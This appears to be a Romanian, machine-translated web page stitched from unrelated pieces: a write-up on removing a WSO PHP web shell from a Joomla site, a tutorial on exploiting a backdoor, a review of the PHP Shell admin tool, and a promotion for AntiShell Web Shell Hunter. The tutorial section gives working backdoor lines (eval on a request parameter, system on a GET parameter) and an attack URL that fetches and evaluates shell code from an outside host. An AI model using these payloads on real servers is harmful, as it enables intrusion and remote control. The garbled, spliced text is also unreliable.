Cum vă ajută AntiShell Web Shell Hunter să găsiți shell-uri web rău intenționate. Script de shell PHP rău intenționat - unde picioarele cresc din Ce este un shell web

Script de shell WSO PHP rău intenționat detectat /libraries/simplepie/idn/OpenIDOpenID.php (site-ul Joomla! 3). Pe acest moment definit doar de unele antivirusuri precum JS / SARS.S61, PHP: Decode-DE, Trojan.Html.Agent.vsvbn, PHP.Shell.354, php.cmdshell.unclassed.359.UNOFFICIAL.

Într-o zi „bună” (ca oricine), una dintre secțiile noastre (http://ladynews.biz), ca urmare a scanării site-ului său cu o găzduire antivirus, a primit doar următorul mesaj:

Fișiere cu conținut rău intenționat au fost găsite în cont. Vă recomandăm cu tărie să restricționați accesul la contul FTP numai de la adresele IP pe care le utilizați și, de asemenea, utilizați protecție antivirus pentru a vă verifica contul pentru viruși. Consultați Ghidurile noastre de securitate și anti-hacking pentru a preveni reinfecția.

Desigur, s-a propus să se ocupe de această rușine - scanarea cu antivirusul standard ClamAV, cu un set de baze de date antivirus implicite, nu a dat niciun rezultat suplimentar.

La începutul acestei povești (23-10-2015), acest script shell virus lipsea din bazele de date antivirus ale majorității antivirusurilor, inclusiv „monștri” precum Comodo, DrWeb, ESET-NOD32, GData, Kaspersky , McAfee, Microsoft, Symantec, TrendMicro și altele, ceea ce a fost confirmat și de scanerul online VirusTotal în data de 23-10-2015. Doar câteva antivirusuri au reușit să identifice scriptul PHP rău intenționat:

Rezultat antivirus Data actualizării AhnLab-V3 JS / SARS. S61 20151022 Avast PHP: Decode- DE [Trj] 20151023 NANO- Antivirus troian. HTML. Agent. vsvbn 20151023

În aceeași zi, ClamAV și Dr.Web au fost anunțați despre detectarea unui script rău intenționat. ClamAV este încă încăpățânat, iar Dr.Web a reacționat la pachetul rău intenționat în 24 de ore:

Solicitarea dvs. a fost analizată. Intrarea corespunzătoare a fost adăugată la baza de date a virusului Dr.Web și va fi disponibilă la următoarea actualizare.

Amenințare: PHP.Shell.354

Dr.Web și-a respectat promisiunea, iar scriptul de virus OpenIDOpenID.php este acum definit ca PHP.Shell.354, cu toate acestea multe antivirusuri precum ClamAV, Comodo, DrWeb, ESET-NOD32, GData, Kaspersky, McAfee, Microsoft, Symantec, TrendMicro, etc. încă nu au nicio idee despre asta (începând cu 25-10-2015).

Ok, am șters fișierul, dar pentru cât timp? De unde a venit, nu putem decât să ghicim. Ce urmeaza? Începem să punem tot felul de componente Securitycheck și să răsucim regulile în .htaccess care interzice accesul la toate și la toată lumea, deoarece pe găzduirea partajată (alias Găzduire partajată, găzduire partajată) nu avem autoritate pentru mai multe. Cât timp vor economisi aceste măsuri, nimeni nu știe.

Apropo, pe tema componentelor Securitycheck ... Securitycheck este o componentă pentru Joomla! și destul de bine. Și iată o anumită porcărie „Protecția site-ului web antivirus” pe care o recomand cu toată lumea, iată o recenzie validată despre această „Protecție a site-ului web antivirus”:

Această componentă creează și un fișier pack.tar în / tmp care conține configuration.php și orice alte parole găsite! FI CONȘTIENT

Ceea ce în traducere înseamnă: „creează și această componentă de rezervăîntregul site din fișierul /tmp/pack.tar, care conține configuration.php cu parole din baza de date! ATENȚIE ”- aceasta înseamnă că„ Protecția site-ului web ”nu miroase din această componentă, ceea ce ar trebui să ducă și victima să se gândească la schimbarea căilor către directorele / logs, / tmp, / cache și refuzarea accesului la acestea.

Făcând clic pe acest link, puteți înțelege că problema are cel puțin mai mult de un an. Privind aici, vom înțelege că mascarea scriptului shell nu este realizată de complicatul base64_encode / gzdeflate, ceea ce înseamnă că în altă parte trebuie să existe o parte care apelează / conectează OpenIDOpenID.php și execută base64_decode / gzinflate. Așadar, OpenIDOpenID.php este doar un rezultat (cunoscut și ca o consecință) și nu un motiv pentru care victima se plânge că spamul a început să fie trimis de pe server la scară industrială, iar ștergerea manuală a fișierelor rău intenționate nu ajută, după care victima nu se plânge de nimic, dar nu este altcineva care găzduiește NIC-RU Găzduirea virtuală „scurgată” poate fi foarte bună. chiar și de multe ori oamenii IMHO lucrează acolo pentru salariu și nu pentru o idee, dar în unele cazuri problema poate fi mult mai profundă.

De exemplu, „Injector iFrame rău intenționat detectat în fișierul Adobe Flash”. Cred că nu este un secret pentru nimeni că poți scrie interfețe pentru încărcarea fișierelor pe site în Flash și să faci multe alte lucruri interesante în ActionScript. Virus în fișierele .swf ( Adobe flash), după cum a arătat practica, poate rămâne neobservată ani de zile și poate fi o ușă neagră pe site ( aka ușă din spate - ușă din spate) prin care sunt „aruncate” fișiere precum „OpenIDOpenID.php”, care pot fi șterse până la albastru în față și fără rezultat.

Ce să faci, cum să găsești „veriga slabă” printre mii de fișiere? Pentru a face acest lucru, trebuie să utilizați așa-numita analiză euristică și, în unele cazuri, să utilizați baze de date antivirus terțe. Trebuie avut în vedere faptul că analiza euristică, în funcție de setările sale, poate da multe falsuri pozitive decât atunci când se utilizează semnături de virus suplimentare de la dezvoltatori terți.

Unde pot obține baze de date antivirus terțe? De exemplu, bazele de date cu semnături antivirus terțe pentru ClamAV pot fi obținute gratuit la www.securiteinfo.com, malwarepatrol.net, rfxn.com. Cum folosesc aceste baze de date antivirus suplimentare? Aceasta va fi o poveste complet diferită. Putem spune doar că bazele de date suplimentare antivirus pentru ClamAV de la rfxn.com (proiectul LMD (Linux Malware Detect)) vizează căutarea de malware în aplicații web și oferă rezultate mai bune. rfxn.com afirmă, de asemenea, că 78% dintre amenințările ale căror amprente digitale sunt în baza lor de date nu sunt detectate de mai mult de 30 de antivirusuri comerciale - și cel mai probabil sunt.

Deci ... Cum s-a încheiat povestea cu script-ul shell shell PHP OpenIDOpenID.php?

S-a decis să se aprovizioneze cu baze de date suplimentare antivirus pentru ClamAV de pe malwarepatrol.net și rfxn.com, să se descarce o copie de rezervă a fișierelor site-ului și să le scaneze local, iată rezultatul scanării:

$ clamscan / ladynews.biz / ../ game_rus.swf: MBL_647563.UNOFFICIAL FOUND / ../ farmfrenzy_pp_rus.swf: MBL_647563.UNOFFICIAL FOUND / ../ beachpartycraze_rus.swf: MBL_2934225.UNOFFICIAL FOUND. / loader_rus.swf: MBL_647563. GĂSIT UNOFICIAL ----------- REZUMAT SCANARE ----------- Viruși cunoscuți: 4174348 Versiune motor: 0.98.7 Directoare scanate: 3772 Fișiere scanate: 18283 Fișiere infectate: 5 Total erori: 1 Date scanate: 417,76 MB Date citite: 533,51 MB (raport 0,78: 1) Timp: 1039,768 sec (17 m 19 s)

/libraries/simplepie/idn/OpenIDOpenID.php după cum s-au șters fișierele .swf menționate mai sus, dar problema este rezolvată? Este greu de spus până acum - săpăm mai departe ...

Din versiunea decriptată a fișierului /libraries/simplepie/idn/OpenIDOpenID.php(http://pastebin.com/WRLRLG9B) uitându-vă la constanta @define ("WSO_VERSION", "2.5"); , devine clar că acesta este un produs numit WSO. După o mică sapare a rețelei pentru cuvântul cheie WSO, s-au obținut următoarele rezultate:

Se pare că subiectul nu este nou de mult timp, așa că luăm regexxer în dinți, continuăm să preluăm fișierele site-ului și găsim: Eroare la deschiderea directorului "/ home / user / libraries / joomla / cache / controller / cache ": Acces interzis

Aha, iată-te, s.ka unde altceva seranulo! Ne uităm la drepturile la director, care nu ar trebui să fie implicit, = chmod 111 (aka Run for Owner / Group / All). Astfel, ceva stă undeva și se răspândește prin cataloage, ascunzându-se chiar de viruși cu chmod 111.

După instalarea chmod 551 pentru catalog și căutarea în interior, a fost găsit /libraries/joomla/cache/controller/cache/cache/langs.php, sursă care este postat aici: http://pastebin.com/JDTWpxjT - director / libraries / joomla / cache / controller / cacheșterge.

Excelent, acum punem în ordine chmod-urile pentru toate fișierele și directoarele:

# schimbarea în bloc a drepturilor (chmod) asupra fișierelor din directorul. / dirname și mai jos find / home / user / public_html -type f -exec chmod 644 () \; # permisiuni de schimbare în bloc (chmod) pe. / dirname și mai jos find / home / user / public_html -type d -exec chmod 755 () \;

Încă o dată repetăm ​​verificarea antivirus cu baze de date suplimentare clamscan /ladynews.biz, dar totul este presupus.

Repetăm ​​căutarea fișierelor cu regexxer și încercăm să căutăm după Cuvinte cheie OpenIDOpenID, OpenID sau WSO - și, ajungem la concluzia că pseudo-secțiunea sa dovedit a fi mult mai largă și mai profundă:

  • - nu ar trebui să fie aici, aici este sursa sa: http://pastebin.com/jYEiZY9G
  • /administrator/components/com_finder/controllers/imagelist.php- nu ar trebui să fie aici, aici este sursa sa: http://pastebin.com/0uqDRMgv
  • /administrator/components/com_users/tables/css.php- nu ar trebui să fie aici, aici este sursa sa: http://pastebin.com/8qNtSyma
  • /administrator/templates/hathor/html/com_contact/contact/toolbar.trash.html.php- nu ar trebui să fie aici, aici este sursa sa: http://pastebin.com/CtVuZsiz
  • /components/com_jce/editor/tiny_mce/plugins/link/img/Manager.php- nu ar trebui să fie aici, aici este sursa sa: http://pastebin.com/2NwTNCxx
  • /libraries/joomla/application/web/router/helpsites.php- nu ar trebui să fie aici, aici este sursa sa: http://pastebin.com/ANHxyvL9
  • /plugins/system/ytshortcodes/XML.php- nu ar trebui să fie aici, aici este sursa sa: http://pastebin.com/GnmSDfc9
  • /templates/index.php - nu ar trebui să fie aici, aici este sursa sa: http://pastebin.com/gHbMeF2t

/administrator/components/com_admin/index.phpși /templates/index.php au fost probabil scripturi de intrare care au executat codul principal folosind funcția eval () foarte depreciată, care a folosit și:

Ei bine, logica din spatele mascării codului rău intenționat este clară. Acum, dacă căutăm construcția „eval ($”), vom găsi multe lucruri mai interesante:

  • /administrator/components/com_admin/sql/updates/postgresql/php.php- http://pastebin.com/gRHvXt5u
  • /components/com_kunena/template/blue_eagle/media/iconsets/buttons/bluebird/newsfeed.php -
  • /components/com_mailto/helpers/index.php -
  • /components/com_users/views/login/file.php -
  • /components/com_users/controller.php- infectat și necesită înlocuire!
  • /include/index.php -
  • /libraries/joomla/string/wrapper/section.php -
  • /libraries/legacy/access/directory.php -
  • /libraries/nextend/javascript/jquery/InputFilter.php -
  • /libraries/nextend/smartslider/admin/views/sliders_slider/tpl/config_tinybrowser.php -
  • /libraries/xef/assets/less/admin.frontpage.php -
  • /media/editors/codemirror/mode/rust/Alias.php -
  • /modules/mod_kunenalatest/language/zh-TW/smtp.php -
  • /modules/mod_kunenalogin/language/de-DE/XUL.php -
  • /plugins/content/jw_allvideos/jw_allvideos/includes/js/mediaplayer/skins/bekle/CREDITS.php -
  • /templates/sj_news_ii/html/mod_sj_contact_ajax/toolbar.messages.php -

Nu toate scripturile PHP virale încă au postat codul pe pastebin.com deoarece doar 10 publicații sunt permise în 24 de ore. În general, ordinea de ștergere este aproximativ următoarea:

Da, aproape că am uitat - înainte de a începe să eliminați scripturile rău intenționate, nu ar strica să adăugați mai multe reguli la .htaccess care interzic accesul direct la orice fișier .php din orice directoare, dar permit accesul doar la fișierele rădăcină / sau / index. php și / administrator / sau /administrator/index.php - aceasta va bloca atacatorul urât să acceseze scripturile shell primite ascunse în diferite directoare de sistem:

UPD 2015-10-28: Ei bine, ce? Ești deja relaxat? E prea devreme...

Acum, să ne uităm în sălbăticia fișierelor site-ului fișiere binare, care nu ar trebui să fie deloc în motor:

find / mypath / -executable -type f find / mypath / -type f -perm -u + x find / mypath / -type f | fișier xargs | grep "\: \ * data $"

Oricine caută va găsi întotdeauna (fișiere binare):

  • /modules/mod_p30life_expectancy_calc/tmpl/accordian.pack.js
  • /images/stories/audio/34061012-b1be419af0b9.mp3
  • /libraries/xef/sources/folder/navigation.php
  • /libraries/joomla/application/web/application.php
  • /libraries/joomla/document/json/admin.checkin.php
  • /libraries/nextend/assets/css/LICENSES.php
  • /libraries/fof/config/domain/toolbar.categories.html.php
  • /libraries/fof/form/field/client.php
  • /libraries/phputf8/sysinfo_system.php
  • /components/com_mobilejoomla/index.php
  • /components/com_mobilejoomla/sysinfo_system.php
  • /components/index.php
  • /components/com_banners/sysinfo_config.php
  • /components/com_kunena/views/home/admin.checkin.php
  • /components/com_jce/editor/tiny_mce/plugins/source/js/codemirror/toolbar.checkin.php
  • /components/com_jce/editor/tiny_mce/plugins/colorpicker/admin.cache.php

Să rezumăm

Nu a fost posibil să se stabilească în mod fiabil de unde au crescut picioarele acestei infecții - dacă este de vină o vulnerabilitate critică găsită recent în motor care permite efectuarea injecției SQL și creșterea privilegiului, sau fișierele menționate mai sus marcate ca fișiere .swf dăunătoare care nu a fost încă descoperită. Este o vulnerabilitate la una dintre componentele sau pluginurile terților sau o găzduire web virtuală scurgeri - întrebarea rămâne deschisă?

În acest moment, fișierele rău intenționate detectate au fost curățate, fișierele motorului sunt reîncărcate complet, regulile din .htaccess sunt baricade ... Cine are timp și cine este interesat să pună împreună și să aleagă această grămadă de rahat poate descărca arhiva wso -php-shell-in-joomla.zip - toate fișierele PHP rău intenționate de mai sus sunt împachetate acolo, parola pentru arhivă este: www.site

TOTAL: Nu există niciodată prea multă paranoia și orice antivirus gratuit sau comercial cu euristicile sale împreună cu baze de date de semnături suplimentare este departe de a fi un panaceu. Prin urmare, orice antivirus este un instrument depășit pentru protejarea unui mediu activ multi-utilizator și pentru a preveni diverse amenințări necunoscute, ar trebui să utilizați metode de protecție paranoică, de exemplu: virtualizare, SELinux, Bastille Linux, bit imuabil, ecryptfs etc!

  • Amenințare: WSO PHP Web Shell
  • Victima: ladynews.biz

Nu că este un articol, dar multe vor fi utile. Așadar, am intrat în panoul de administrare, în cele din urmă am putut cel puțin să înghesuim acest cod undeva, de exemplu:

if (isset ($ _ REQUEST ["e"])) eval (stripslashes ($ _ REQUEST ["e"]));


sau pur și simplu:

assert (stripslashes ($ _ CERERE));


stripslashes în acest caz exclusiv pentru a ocoli magic_quotes = ON
Mulți inserează

sistem ($ _ GET ["cmd"])

Și alte urâțenii, dar toate acestea sunt inutile, de fapt, totul este mai simplu. Așadar, ați introdus acest cod undeva (în faq.php, sau aveți deja o astfel de ușă din spate undeva în profunzimea scripturilor serverului).
Acestea. la final, de exemplu, ați obținut următorul link pentru a lucra:

http: //localhost/user.php? e = phpinfo ();


Și după aceea, mulți începători au o stupoare. Imediat următoarea întrebare este - ce să facem în continuare?
Și să aruncăm o privire mai atentă la acest phpinfo, care ne-a adus, principalele două puncte care ne vor interesa în această situație:

allow_url_fopen
allow_url_include

allow_url_include

Da, staniu, desigur, dar de obicei nu.

Rămâne

Și el, de regulă, = ON. Cum putem folosi această ocazie, lăsată cu imprudență de către administrator, pentru a nu abura prea mult (nu căutați foldere disponibile pentru scriere și aflați astfel de prostii și, în general, nu umpleți shell-ul ca atare, ci urcați pe server ca și cum coaja este deja umplută). E foarte simplu. În cazul în care un

allow_url_fopen = ACTIVAT

Și aveți un cod care afișează cel puțin că ați citit deja toate configurațiile, ați fuzionat tot ce aveți nevoie etc. (nu trebuie confundat cu „twist”, doar ce se poate citi)

Luăm ultima coajă de la dragi oRb, eliminați prima linie:

+
ștergeți ultima
+
puteți șterge parola, nu umplem shell-ul, ci o folosim fără să plecăm

salvați pentru orice gazdă ca bla_bla.txt(același narod.ru este în regulă) sau sub forma unei imagini pe un serviciu de găzduire a fișierelor care oferă linkuri directe pentru a descărca conținut și a face următoarea solicitare:
Codul:

http: //localhost/user.php? a = eval (file_get_contents ("http://site.ru/bla_bla.txt"));


Tot. Aveți un shell complet, fără a-l încărca fizic pe server, cu toate capacitățile obișnuite ale shell-ului. Multumesc pentru atentie
PS: testat pe WSO2.4 ( wso2_pack.php)

Descrierea carcasei:
Autorizare
Informații despre server
Manager fișiere (copiați, redenumiți, mutați, ștergeți, modificați, atingeți, creați fișiere și foldere)
Vizualizați, vizualizați în hexagon, editați, încărcați din nou, încărcați fișiere
Lucrul cu arhive zip (ambalare, despachetare)
Consolă
Manager SQL (MySql, PostgreSql)
Executarea codului PHP
Lucrul cu șiruri + căutarea hashului în bazele de date online
Bindport și back-connect (Perl)
Căutați text în fișiere
* nix / Windows
Dintre jetoane
Motor anti-căutare (User-Agent este bifat, dacă este un motor de căutare, atunci se returnează o eroare 404)
Consola își amintește comenzile introduse. (puteți naviga prin ele folosind săgețile sus și jos când vă concentrați pe câmpul de introducere)
Poate folosi AJAX
Greutate redusă (24,32 KB)
Alegerea codificării în care rulează shell-ul.

Acest utilitar oferă o interfață web pentru lucrul la distanță cu sistemul de operare și serviciile / daemonii săi.
Utilizarea acestui produs în scopuri ilegale este supusă răspunderii penale.

Arhiva conține cea mai recentă versiune shell și un mic instrument WSOmanager pentru lucrul cu shell-uri.

Descarcă shell:

Recent, pe marile întinderi ale internetului, am dat de mențiunea „ PHP Shell Acum câțiva ani, acest utilitar m-a ajutat foarte mult și acum vreau să dau un fel de datorie dezvoltatorului său Martin Geisler (http://mgeisler.net/).

Care este scopul „PHP Shell”? Cred că fiecare programator web „avansat”, darămite sysadmins, a dat peste și a folosit SSH. SSH ne permite să accesăm de la distanță serverul și să executăm comenzi shell pe el (ei bine, există tot felul de comenzi precum mersul prin directoare înainte și înapoi, în sus și în jos, mișcarea, ștergerea și copierea fișierelor, rularea scripturilor și tot felul de utilități inteligente ), ca și cum firul către monitorul dvs. de la unitatea de sistem s-a prelungit la dimensiuni incredibile și a ajuns, până la serverul gazdei. Trebuie să spun că este posibil să treceți prin ssh și X-graphics, o imagine de desktop care afișează aplicații de fereastră care rulează, dar acest lucru nu este clar pentru serverele web.

Pe scurt, dacă nu aveți SSH pe găzduire, atunci „ce se întâmplă în regatul danez”. Dezavantajul este că adesea SSH este dezactivat în mod implicit pe site-ul dvs. „proaspăt” și este nevoie de ceva timp pentru a vă certa cu echipa de asistență pentru ca ssh să funcționeze. Exact asta s-a întâmplat în acea seară îndepărtată de iarnă. Am avut nevoie urgent să mut site-ul de la o mașină la alta, în timpul căreia au apărut probleme și am ajuns în mod obișnuit la comanda rapidă a chitului de pe desktop pentru a vedea ce era „în interiorul” pacientului. Hopa ... și suportul ssh nu este activat. Cum să fii? Dacă sunteți suficient de priceput în programarea într-un anumit limbaj acolo, atunci nu va fi dificil să scrieți un mic script care să implementeze sarcina dorită. Am deschis google și, după ce am parcurs câteva legături, am găsit o mențiune despre PHP Shell. Pe scurt, am plecat de acasă la timp.

În realitate, am fost foarte norocos că am avut destule capacități reduse de shell pe care mi le-a oferit PHP Shell - este încă o imitație a acestuia.

În centrul său, PHP Shell folosește funcția php - proc_open. Această funcție execută o comandă și deschide fluxuri de I / O pentru a introduce unele informații în aplicație (imitând intrarea manuală ca pe o tastatură) și să scoată rezultatele muncii (dacă știi ce sunt conductele, atunci vorbim despre lor). De fapt, funcția proc_open este o versiune îmbunătățită și extinsă a funcțiilor exec sau a sistemului. Cu toate acestea, aceștia au pornit doar programul și nu au dat posibilitatea de a interacționa cu acesta, a trebuit să specificați imediat toate datele necesare pentru ca comanda să funcționeze în parametrii liniei de comandă. proc_open vă permite să creați țevi asociate cu scriptul php și, prin urmare, puteți simula introducerea datelor în program și citiți rezultatele activității sale. Pentru iubitorii de găzduire gratuită, voi spune imediat:

"NU, NU POTI OBȚINE ACCES SSH CU PHP Shell."

Ideea este că, pentru găzduirea gratuită sau foarte ieftină, este obișnuit să rulați php în safe_mode. Are o serie de funcții dezactivate, inclusiv proc_open.

„NU, CU PHPSHELL NU VETI PUTEA OPERA SOFTWARE-UL INTERACTIV”.

Însăși esența web ne spune că nu este posibil să rulăm un program pe un server la distanță care ar continua să funcționeze și ne-ar permite să introducem și să ieșim date în timpul mai multor solicitări http separate.

"NU, NU POȚI OBȚINE ACCES LA TOATE PROGRAMURILE, FIȘIERELE ȘI DOSARELE DE PE SERVER."

Scriptul rulează fie în numele apache, iar apoi capacitățile sale sunt limitate doar de faptul că contul apache are drepturile de a o face. Sau, ca opțiune, dacă suexec este utilizat pe hosting (http://en.wikipedia.org/wiki/SuEXEC), atunci drepturile dvs. vor coincide cu drepturile contului din care rulează scriptul php.

Să presupunem că acest lucru nu vă oprește și că ați descărcat și despachetat arhiva de pe serverul dvs. într-un folder, să spunem phpshell. Dacă introduceți „cumva-numit-site-ul dvs. / phpshell / phpshell.php” în bara de adrese a browserului, atunci vi se va cere să vă prezentați, introduceți numele și parola - desigur, acestea nu sunt acreditările care ai primit de la gazda ta

Deci, trebuie să configurați permisiunile: cine poate accesa shell-ul prin acest utilitar. Pentru a face acest lucru, găsiți secțiunea utilizatorilor din fișierul config.php și adăugați numele de utilizator și parola la acesta în formularul următor:

Vasyano = secret

Dacă sunteți confuz de faptul că parola este setată în text clar, atunci folosind fișierul pwhash.php puteți afla plierea parolei md5 și va fi stocată în fișierul config.php

Acum încercăm să intrăm din nou și să intrăm în fereastră, unde în partea inferioară a ferestrei introducem comanda, facem clic pe „start” și apoi rezultatul execuției sale este afișat în centrul ferestrei paginii

Atât, poate că phpshell te va ajuta cumva.

Majoritatea atacurilor asupra resurselor corporative implică injectarea de shell-uri web - cod care face posibilă controlul mașinilor infectate din afara rețelei. AntiShell Web Shell Hunter este un instrument de securitate care include un set întreg de mecanisme pentru detectarea shell-urilor web.




Web shell este un script care este încărcat pe server și servește pentru administrare la distanță. Devine rău intenționat doar atunci când este controlat de un atacator. Și în acest caz, el reprezintă o amenințare serioasă.

Serverul infectat nu trebuie să fie conectat la Internet - poate fi localizat în rețeaua internă a companiei. Apoi, shell-ul web este utilizat pentru a obține acces la alte gazde cu aplicații sau informații critice.

Orice limbă acceptată de serverul web țintă poate fi utilizată pentru a scrie shell-uri web. În practică, PHP și ASP sunt cele mai utilizate, deoarece sunt cele mai populare. Programele rău intenționate de pe Perl, Ruby, Python și Unix shell sunt, de asemenea, răspândite.

Shell-urile web sunt instalate într-un mod destul de standard pentru aplicațiile rău intenționate - folosind vulnerabilități în software-ul CMS sau server web. După aceea, acestea funcționează ca ușile din spate, ceea ce permite unui atacator să execute comenzi arbitrare pe mașina de la distanță, inclusiv injectarea de ransomware sau lansarea atacurilor pe alte servere.

Un pericol deosebit al carcasei web este simplitatea relativă a acestora. Modificarea scriptului, rezultând într-un alt program, este o sarcină pe care chiar și un începător o poate face. Datorită acestei calități, este dificil de detectat shell-urile web cu instrumente antivirus standard.

La fel ca alte programe malware, shell-urile web pot fi identificate printr-o serie de funcții externe. Cu toate acestea, o parte semnificativă a acestora se poate referi și la dosare complet legale, astfel încât orice indicatori suspecți trebuie luați în considerare într-un complex, analizând imaginea întreagă, nu fragmentele sale.

Indicatorii posibili ai prezenței unui shell web pe server pot fi:

  • perioade de încărcare anormală a serverului;
  • prezența fișierelor cu marcaj de timp suspect (de exemplu, mai târziu de ora ultimei actualizări de software);
  • prezența fișierelor suspecte în locuri accesibile de pe Internet;
  • prezența fișierelor care conțin linkuri către cmd.exe, eval și altele asemenea;
  • prezența autorizațiilor suspecte din rețeaua internă;
  • prezența fișierelor care generează trafic neobișnuit.

Evident, analiza „manuală” în acest caz, dacă este posibil, necesită prea multe resurse umane, astfel încât aplicarea sa este lipsită de orice fezabilitate practică. AntiShell Web Shell Hunter de la Garhi Technology automatizează acest proces, pretinzând că este garantat să recunoască toate shell-urile web cunoscute.

Aplicația se bazează pe următoarele tehnologii:

  • căutare după cuvinte cheie. Toate fișierele sunt verificate pentru cuvinte și comenzi care pot fi asociate cu atacul;
  • analiza semnăturilor: căutarea semnăturilor unor web shell cunoscute;
  • analiza celor mai lungi linii. Adesea, codul rău intenționat este criptat în așa fel încât să ocolească căutările de cuvinte cheie. Acest lucru face ca liniile de cod să fie deosebit de lungi, ceea ce le face detectabile;
  • calculul entropiei lui Shannon în codul sursă. Fiecărei linii de cod i se atribuie o evaluare, pe baza căreia puteți evalua gradul de amenințare;
  • căutați codul rău intenționat folosind metoda indexului de coincidență.

Aceasta rezolvă una dintre principalele probleme în detectarea web shell-urilor, asociată cu varietatea limbajelor utilizate și posibilitatea modificării ușoare. Acești factori nu afectează funcționarea AntiShell Web Shell Hunter, ceea ce îl face universal și poate fi utilizat pentru a proteja orice server.

Deoarece fișierele care nu au fost modificate de la scanarea anterioară sunt excluse de la procesare, AntiShell Web Shell Hunter nu plasează o încărcare mare pe server. În plus, această abordare reduce timpul de verificare.

În același timp, administratorii pot seta în mod independent timpul de scanare pe baza fluctuațiilor zilnice ale încărcării serverului. Dacă este necesar, rutina zilnică este înlocuită cu o săptămânală sau chiar lunară, care vă permite să optimizați funcționarea întregului sistem.

Programul detectează fișierele care conțin codul de shell web și oferă administratorului de sistem informații complete despre obiect: data și ora creației, numele proprietarului, drepturile și așa mai departe.

Toate aceste date (dar nu fișierele în sine) se îndreaptă și către centrul de clienți al companiei dezvoltatoare, care, pe baza lor, poate oferi asistență în gestionarea incidentului și investigarea consecințelor acestuia. Clienții abonați la un serviciu cu plată pot utiliza, de asemenea, un utilitar special pentru a descărca singuri fișierele infectate pentru o analiză ulterioară.

Mesajele despre obiectele găsite sunt trimise administratorului de sistem prin e-mail. Nu este nevoie ca acesta să monitorizeze personal procesul.

Astăzi AntiShell Web Shell Hunter este singurul instrument care vizează în mod special detectarea shell-urilor web. O serie de aplicații antivirus includ o funcție similară, dar numai ca opțiune suplimentară, care este inactivă în mod implicit. De regulă, se bazează exclusiv pe analiza semnăturii, astfel încât eficacitatea lor este slabă.

Deoarece utilizarea shell-urilor web pentru a ataca serverele devine din ce în ce mai frecventă, este logic să protejăm sistemul cu o soluție specializată. După cum se spune, nu există niciodată prea multă siguranță.